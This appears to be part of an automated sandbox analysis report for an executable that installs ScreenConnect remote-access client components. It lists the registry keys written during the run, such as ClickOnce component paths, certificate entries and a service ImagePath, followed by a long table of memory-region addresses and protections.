HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_963930cc5ced28c7
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
ProgramId
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
FileId
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
LowerCaseLongPath
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
LongPathHash
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Name
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
OriginalFileName
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Publisher
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Version
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
BinFileVersion
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
BinaryType
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
ProductName
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
ProductVersion
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
LinkDate
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
BinProductVersion
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
AppxPackageFullName
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
AppxPackageRelativeId
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Size
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Language
\REGISTRY\A\{2bcf3aae-6175-c71f-adb4-3020a6517082}\Root\InventoryApplicationFile\khwhsyfsj1.exe|239c70f602c0009d
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!0e00000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0c00000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0a00000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0800000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!0600000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!0400000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!0200000011ad6e00ec120000fc1200000000000000000000ba9ebe370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!1c00000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!1a00000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!1800000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!1600000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!1400000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!1200000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!1000000021ad6e00ec120000fc1200000000000000000000b701c1370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!1d00000040ad6e00ec120000fc120000000000000000000007c6c5370327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_98134c89f0fa827c
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_503889a8656f441d
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)
ImagePath
There are 182 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FF888120000
trusted library allocation
page read and write
1D4572FB000
heap
page read and write
FF4000
unkown
page read and write
5F0000
heap
page read and write
2FA0000
trusted library section
page read and write
1D4572A8000
heap
page read and write
1B697000
heap
page read and write
1E0E83A0000
trusted library section
page readonly
189C5600000
heap
page read and write
1425000
heap
page read and write
7FF888250000
trusted library allocation
page read and write
B63A07E000
unkown
page readonly
B6380EC000
stack
page read and write
189C5680000
heap
page read and write
55E0000
unkown
page readonly
E9E000
stack
page read and write
98328FD000
stack
page read and write
1D459179000
heap
page read and write
43F0000
trusted library allocation
page read and write
1060000
heap
page execute and read and write
7FF887FE7000
trusted library allocation
page read and write
189C6437000
heap
page read and write
1D43EDB2000
trusted library allocation
page read and write
16CF79000
stack
page read and write
1E0EC8E5000
heap
page read and write
FAE000
stack
page read and write
1D459130000
heap
page read and write
B6392FE000
stack
page read and write
5590000
trusted library allocation
page read and write
1E0ECB60000
remote allocation
page read and write
1E0EC730000
trusted library allocation
page read and write
1D44ED34000
trusted library allocation
page read and write
7FF8881B2000
trusted library allocation
page read and write
1D43EDAE000
trusted library allocation
page read and write
189C640D000
heap
page read and write
2DBF000
trusted library allocation
page read and write
BD0000
heap
page read and write
1E0ECA04000
trusted library allocation
page read and write
7FF8880C1000
trusted library allocation
page read and write
7FF44CB40000
trusted library allocation
page execute and read and write
1D457820000
heap
page read and write
1F160000
trusted library allocation
page read and write
1D458BB2000
trusted library allocation
page read and write
1256000
heap
page read and write
1249000
heap
page read and write
1E0ECA90000
trusted library allocation
page read and write
1906000
trusted library allocation
page read and write
1D459182000
heap
page read and write
1D45785D000
heap
page read and write
1BBAE000
stack
page read and write
1BE88000
heap
page read and write
3090000
heap
page read and write
1D43EBFC000
trusted library allocation
page read and write
189C56BA000
heap
page read and write
2C60000
heap
page read and write
16D0FE000
stack
page read and write
5560000
trusted library allocation
page read and write
1E0E8380000
trusted library section
page readonly
16E07E000
unkown
page readonly
5544000
unkown
page readonly
1771000
trusted library allocation
page read and write
B6B000
unkown
page readonly
1D4589B0000
heap
page read and write
3661000
trusted library allocation
page read and write
1E0EC7D0000
trusted library allocation
page read and write
7FF88818C000
trusted library allocation
page read and write
1D45AFA7000
heap
page read and write
1BEA2000
heap
page read and write
12DB1000
trusted library allocation
page read and write
7FF887E0D000
trusted library allocation
page execute and read and write
1B34D000
stack
page read and write
1176000
heap
page read and write
7FF887EC0000
trusted library allocation
page execute and read and write
189C5F72000
heap
page read and write
362F000
trusted library allocation
page read and write
1D43D170000
trusted library allocation
page read and write
189C643E000
heap
page read and write
B63987A000
stack
page read and write
3BE5000
trusted library allocation
page read and write
15DE000
stack
page read and write
2726AF02000
heap
page read and write
1E0EC7B0000
trusted library allocation
page read and write
189C6512000
heap
page read and write
189C5F3B000
heap
page read and write
2DB1000
trusted library allocation
page read and write
B6393FE000
stack
page read and write
189C641B000
heap
page read and write
1D4572F5000
heap
page read and write
1AEA000
trusted library allocation
page read and write
1650000
trusted library allocation
page read and write
B639BFE000
unkown
page readonly
10EB000
heap
page read and write
1E0EC854000
heap
page read and write
1640000
trusted library allocation
page read and write
7FF887E24000
trusted library allocation
page read and write
189C5F55000
heap
page read and write
7FF888040000
trusted library allocation
page read and write
7FF8881C0000
trusted library allocation
page read and write
7FF887FC0000
trusted library allocation
page read and write
1D43EDBE000
trusted library allocation
page read and write
1BAAE000
stack
page read and write
1E0EC903000
heap
page read and write
16D07E000
unkown
page readonly
1B6FB000
heap
page read and write
1D43D1C0000
heap
page read and write
189C5F5D000
heap
page read and write
1C2F0000
heap
page read and write
189C5697000
heap
page read and write
1E0EC90A000
heap
page read and write
30F1000
trusted library allocation
page read and write
7FF88805E000
trusted library allocation
page read and write
1E0E7A02000
heap
page read and write
7FF888070000
trusted library allocation
page read and write
3CE0000
trusted library allocation
page read and write
42CE000
stack
page read and write
1E0E7D01000
trusted library allocation
page read and write
189C5683000
heap
page read and write
4620000
trusted library allocation
page read and write
7FF887FBE000
trusted library allocation
page read and write
3ED0000
trusted library allocation
page read and write
1653000
heap
page read and write
189C649D000
heap
page read and write
1D45927F000
heap
page read and write
7FF888060000
trusted library allocation
page read and write
1D45AF07000
heap
page read and write
189C5F5F000
heap
page read and write
1BE0F000
heap
page read and write
1D4572D8000
heap
page read and write
189C5613000
heap
page read and write
1E0EC90F000
heap
page read and write
1E0E7A15000
heap
page read and write
2726A950000
trusted library allocation
page read and write
189C5F6D000
heap
page read and write
2C40000
heap
page read and write
CBE000
stack
page read and write
3EBE000
stack
page read and write
1E0E7B13000
heap
page read and write
7FF888180000
trusted library allocation
page read and write
7FF888210000
trusted library allocation
page read and write
142B000
heap
page read and write
B638C7C000
stack
page read and write
3CD0000
trusted library allocation
page read and write
B63977E000
unkown
page readonly
12DBF000
trusted library allocation
page read and write
B63907E000
unkown
page readonly
7FF888060000
trusted library allocation
page read and write
7FF887E7C000
trusted library allocation
page execute and read and write
2726AF00000
heap
page read and write
7FF887FC0000
trusted library allocation
page read and write
189C647C000
heap
page read and write
B0E000
stack
page read and write
1D45AF90000
heap
page read and write
7FF887EE6000
trusted library allocation
page execute and read and write
5B5000
heap
page read and write
98327FA000
stack
page read and write
3CEA000
trusted library allocation
page read and write
7FF888030000
trusted library allocation
page read and write
189C5F10000
heap
page read and write
E30000
heap
page read and write
5530000
unkown
page readonly
98325FD000
stack
page read and write
10E3000
heap
page read and write
7FF888040000
trusted library allocation
page read and write
FF4000
unkown
page read and write
189C5E02000
heap
page read and write
189C6433000
heap
page read and write
1D43EF36000
trusted library allocation
page read and write
16DF7C000
stack
page read and write
189C5F00000
heap
page read and write
189C6502000
heap
page read and write
FDD000
trusted library allocation
page execute and read and write
189C5F29000
heap
page read and write
189C5F2A000
heap
page read and write
7FF888080000
trusted library allocation
page read and write
7FF887FDD000
trusted library allocation
page read and write
1660000
heap
page read and write
2FE0000
heap
page read and write
15E0000
heap
page read and write
1E0EC84E000
heap
page read and write
7FF887FF6000
trusted library allocation
page read and write
189C5F56000
heap
page read and write
7FF887E43000
trusted library allocation
page read and write
B73000
unkown
page readonly
1D4591F8000
heap
page read and write
1C390000
heap
page read and write
1B747000
heap
page read and write
FCD000
trusted library allocation
page execute and read and write
7FF88831A000
trusted library allocation
page read and write
7FF8880D5000
trusted library allocation
page read and write
1E0E728F000
heap
page read and write
7FF888312000
trusted library allocation
page read and write
B71000
unkown
page write copy
1D45AFAA000
heap
page read and write
7FF888160000
trusted library allocation
page read and write
1E0E8040000
trusted library allocation
page read and write
1E0EC7C0000
trusted library allocation
page read and write
189C5F57000
heap
page read and write
1D4591E6000
heap
page read and write
1B763000
heap
page read and write
1E0E7200000
heap
page read and write
B6B000
unkown
page readonly
7FF887E04000
trusted library allocation
page read and write
7FF888390000
trusted library allocation
page read and write
189C5F32000
heap
page read and write
1D459215000
heap
page read and write
93D000
stack
page read and write
131A1000
trusted library allocation
page read and write
7FF887E5C000
trusted library allocation
page execute and read and write
1D45AFD4000
heap
page read and write
7FF887E4D000
trusted library allocation
page execute and read and write
B63937E000
unkown
page readonly
9D0000
heap
page read and write
1462000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
B71000
unkown
page read and write
189C6370000
remote allocation
page read and write
B63957E000
stack
page read and write
1E0E7291000
heap
page read and write
7FF887E33000
trusted library allocation
page execute and read and write
7FF888220000
trusted library allocation
page read and write
189C5F52000
heap
page read and write
1BE71000
heap
page read and write
B63A5FE000
stack
page read and write
B99000
heap
page read and write
839F9F9000
stack
page read and write
1D4591CC000
heap
page read and write
7FF887F16000
trusted library allocation
page execute and read and write
7FF88801B000
trusted library allocation
page read and write
141F000
heap
page read and write
7FF887FF0000
trusted library allocation
page read and write
1D4591F1000
heap
page read and write
B50000
heap
page read and write
16DD7E000
unkown
page readonly
7FF887FE0000
trusted library allocation
page read and write
1B6A9000
heap
page read and write
167A000
trusted library allocation
page execute and read and write
7FF887E10000
trusted library allocation
page read and write
B63967E000
unkown
page readonly
7FF888314000
trusted library allocation
page read and write
1D45919B000
heap
page read and write
7FF887FE0000
trusted library allocation
page read and write
1E0E8280000
trusted library allocation
page read and write
1D43F23F000
trusted library allocation
page read and write
7FF887FD7000
trusted library allocation
page read and write
116C000
heap
page read and write
1D4573B0000
heap
page execute and read and write
7FF888000000
trusted library allocation
page read and write
131AE000
trusted library allocation
page read and write
1D45AFC6000
heap
page read and write
16D87B000
stack
page read and write
FB0000
heap
page read and write
7FF888057000
trusted library allocation
page read and write
7FF8882E0000
trusted library allocation
page read and write
1E0ECB60000
remote allocation
page read and write
1D43CF18000
heap
page read and write
2EDE000
stack
page read and write
B63927E000
unkown
page readonly
1E0ECB10000
trusted library allocation
page read and write
B638F7E000
unkown
page readonly
189C64A3000
heap
page read and write
1982000
trusted library allocation
page read and write
7FF888050000
trusted library allocation
page read and write
7FF887E24000
trusted library allocation
page read and write
1E0EC7A0000
trusted library allocation
page read and write
1D457395000
heap
page read and write
7FF887E34000
trusted library allocation
page read and write
3DA0000
trusted library allocation
page read and write
1D44EE36000
trusted library allocation
page read and write
428E000
stack
page read and write
1E0E7213000
heap
page read and write
1E0EC8F7000
heap
page read and write
FD7000
trusted library allocation
page read and write
7FF887FA5000
trusted library allocation
page read and write
2BAE000
stack
page read and write
3BF0000
trusted library allocation
page read and write
1D43EB40000
heap
page read and write
AB0000
heap
page read and write
FD0000
heap
page read and write
5280000
heap
page read and write
3080000
trusted library section
page readonly
189C6469000
heap
page read and write
112B000
heap
page read and write
7FF8880C9000
trusted library allocation
page read and write
1477000
trusted library allocation
page execute and read and write
7FF887E02000
trusted library allocation
page read and write
386E000
stack
page read and write
1210000
heap
page read and write
2E3B000
trusted library allocation
page execute and read and write
1E0E8390000
trusted library section
page readonly
1D43CEF0000
heap
page read and write
189C6487000
heap
page read and write
4410000
trusted library allocation
page read and write
1E0EC81F000
heap
page read and write
189C5644000
heap
page read and write
189C5F30000
heap
page read and write
7FF887FF0000
trusted library allocation
page read and write
1178000
heap
page read and write
1E0ED000000
heap
page read and write
14DE000
stack
page read and write
15C0000
trusted library allocation
page execute and read and write
189C5670000
heap
page read and write
7FF887E13000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
1B72D000
stack
page read and write
1E0EC841000
heap
page read and write
189C56FC000
heap
page read and write
1AE5000
trusted library allocation
page read and write
16D67C000
stack
page read and write
7FF887E5B000
trusted library allocation
page execute and read and write
10AA000
heap
page read and write
1D4591D6000
heap
page read and write
1B76F000
heap
page read and write
1D45AF05000
heap
page read and write
B639D79000
stack
page read and write
19A4000
trusted library allocation
page read and write
189C5F13000
heap
page read and write
189C5F29000
heap
page read and write
12E3000
heap
page read and write
1630000
trusted library allocation
page read and write
189C6478000
heap
page read and write
1643000
trusted library allocation
page execute and read and write
7FF888310000
trusted library allocation
page read and write
189C64A5000
heap
page read and write
1E0E727D000
heap
page read and write
A9D000
heap
page read and write
189C6476000
heap
page read and write
3C00000
trusted library allocation
page read and write
FC3000
trusted library allocation
page execute and read and write
1D43F1B5000
trusted library allocation
page read and write
1E0E8370000
trusted library section
page readonly
1D43EDC2000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
12F1000
stack
page read and write
189C565E000
heap
page read and write
B6390FE000
stack
page read and write
10A0000
heap
page read and write
7FF887EBC000
trusted library allocation
page execute and read and write
12C0000
heap
page read and write
7FF888200000
trusted library allocation
page read and write
7FF888036000
trusted library allocation
page read and write
189C572C000
heap
page read and write
189C56B7000
heap
page read and write
A60000
heap
page read and write
2BEE000
stack
page read and write
1640000
trusted library allocation
page read and write
B63887E000
stack
page read and write
189C5F54000
heap
page read and write
189C6445000
heap
page read and write
1475000
trusted library allocation
page execute and read and write
1D43F189000
trusted library allocation
page read and write
7FF887EB0000
trusted library allocation
page read and write
1E0EC8E1000
heap
page read and write
2726AE00000
heap
page read and write
1E0EC8E5000
heap
page read and write
1D44ED46000
trusted library allocation
page read and write
FC0000
heap
page read and write
189C56EF000
heap
page read and write
10C4000
heap
page read and write
A66000
heap
page read and write
1D43EF20000
trusted library allocation
page read and write
8FC000
stack
page read and write
189C6400000
heap
page read and write
7FF88833E000
trusted library allocation
page read and write
1E0E7B02000
heap
page read and write
189C5F52000
heap
page read and write
B80000
heap
page read and write
C7E000
stack
page read and write
189C56C8000
heap
page read and write
3BCE000
trusted library allocation
page read and write
1D459273000
heap
page read and write
1E0EC8FB000
heap
page read and write
B638D7E000
unkown
page readonly
2726AB02000
trusted library allocation
page read and write
7FF887EEC000
trusted library allocation
page execute and read and write
7FF887F20000
trusted library allocation
page execute and read and write
1D43F26F000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
1C82A000
heap
page read and write
189C5F32000
heap
page read and write
189C5713000
heap
page read and write
7FF888020000
trusted library allocation
page read and write
189C5F55000
heap
page read and write
1D4591A0000
heap
page read and write
16D47C000
stack
page read and write
7FF888170000
trusted library allocation
page read and write
165D000
trusted library allocation
page execute and read and write
3DEE000
stack
page read and write
7FF888010000
trusted library allocation
page execute and read and write
55E0000
heap
page read and write
189C56A9000
heap
page read and write
7FF887EE6000
trusted library allocation
page read and write
1D43D220000
heap
page read and write
1B6E9000
heap
page read and write
189C64CE000
heap
page read and write
1D44EC62000
trusted library allocation
page read and write
1E0EC7C0000
trusted library allocation
page read and write
1E0ECAA0000
trusted library allocation
page read and write
4440000
trusted library allocation
page read and write
189C6495000
heap
page read and write
1D44ED4C000
trusted library allocation
page read and write
7FF887F50000
trusted library allocation
page execute and read and write
7FF887FD0000
trusted library allocation
page read and write
7FF887E3D000
trusted library allocation
page execute and read and write
3523000
trusted library allocation
page read and write
1E0EC7F0000
trusted library allocation
page read and write
1D44EC04000
trusted library allocation
page read and write
189C5F5D000
heap
page read and write
7FF888363000
trusted library allocation
page read and write
1E0ECB00000
trusted library allocation
page read and write
FF6000
unkown
page readonly
1460000
trusted library allocation
page read and write
1E0E7296000
heap
page read and write
1D45AF5B000
heap
page read and write
1D43EC00000
trusted library allocation
page read and write
2FE0000
unkown
page readonly
7FF888025000
trusted library allocation
page read and write
7FF88806E000
trusted library allocation
page read and write
1172000
heap
page read and write
1D43F166000
trusted library allocation
page read and write
7FF888260000
trusted library allocation
page execute and read and write
40F1000
trusted library allocation
page read and write
55E2000
unkown
page readonly
13CF000
stack
page read and write
1E0ECB60000
remote allocation
page read and write
7FF888100000
trusted library allocation
page read and write
DDC000
stack
page read and write
2DA0000
heap
page execute and read and write
1D457301000
heap
page read and write
2726AE02000
heap
page read and write
B63877E000
unkown
page readonly
10BF000
stack
page read and write
1D43ED68000
trusted library allocation
page read and write
189C5F30000
heap
page read and write
1E0ECAF0000
trusted library allocation
page read and write
7FF887E50000
trusted library allocation
page read and write
1BE80000
heap
page read and write
45D0000
heap
page read and write
1BE4D000
heap
page read and write
7FF887E40000
trusted library allocation
page read and write
189C5680000
heap
page read and write
189C647F000
heap
page read and write
10FD000
stack
page read and write
189C5E00000
heap
page read and write
1BCAE000
stack
page read and write
1BE6B000
heap
page read and write
2E37000
trusted library allocation
page execute and read and write
189C5F5A000
heap
page read and write
1C3B0000
heap
page read and write
189C5F32000
heap
page read and write
14DE000
stack
page read and write
1D43EBED000
trusted library allocation
page read and write
1650000
trusted library allocation
page read and write
1E0ECA00000
trusted library allocation
page read and write
1470000
trusted library allocation
page read and write
A30000
unkown
page readonly
19A6000
trusted library allocation
page read and write
1E0EC800000
heap
page read and write
7FF888340000
trusted library allocation
page read and write
189C5DB0000
remote allocation
page read and write
7FF887FE9000
trusted library allocation
page read and write
1E0E83B0000
trusted library section
page readonly
189C5560000
heap
page read and write
16D37E000
unkown
page readonly
1D43CF36000
heap
page read and write
1E0EC7D0000
trusted library allocation
page read and write
189C56AD000
heap
page read and write
1E0E7329000
heap
page read and write
131B0000
trusted library allocation
page read and write
1E0EC8CE000
heap
page read and write
7FF88800C000
trusted library allocation
page read and write
1BB6E000
stack
page read and write
189C5F55000
heap
page read and write
1D43EB60000
heap
page read and write
325F000
trusted library allocation
page read and write
7FF887E20000
trusted library allocation
page read and write
1E0E8730000
trusted library allocation
page read and write
189C646E000
heap
page read and write
189C573B000
heap
page read and write
1D44ED43000
trusted library allocation
page read and write
305E000
stack
page read and write
7FF887E20000
trusted library allocation
page read and write
189C645F000
heap
page read and write
2726AA13000
unkown
page read and write
1B6A4000
heap
page read and write
B61000
unkown
page execute read
2E35000
trusted library allocation
page execute and read and write
7FF888000000
trusted library allocation
page read and write
1406000
heap
page read and write
1C7F0000
heap
page read and write
7FF88831C000
trusted library allocation
page read and write
189C643D000
heap
page read and write
1620000
trusted library allocation
page read and write
7FF887E4B000
trusted library allocation
page execute and read and write
16DA7E000
stack
page read and write
1194000
heap
page read and write
F9E000
stack
page read and write
4400000
trusted library allocation
page execute and read and write
1466000
trusted library allocation
page execute and read and write
1B90F000
stack
page read and write
1E0E7240000
heap
page read and write
1B72B000
heap
page read and write
1E0E7313000
heap
page read and write
1D43E9D7000
heap
page read and write
F50000
heap
page read and write
1E0ECA00000
trusted library allocation
page read and write
5550000
trusted library allocation
page read and write
10CF000
heap
page read and write
7FF887E30000
trusted library allocation
page read and write
10AD000
heap
page read and write
1BE26000
heap
page read and write
98324FE000
stack
page read and write
16DC7B000
stack
page read and write
7FF8881A0000
trusted library allocation
page read and write
3BFB000
trusted library allocation
page read and write
1E0E8701000
trusted library allocation
page read and write
13EF000
stack
page read and write
189C5F59000
heap
page read and write
1AEC000
trusted library allocation
page read and write
1E0E7274000
heap
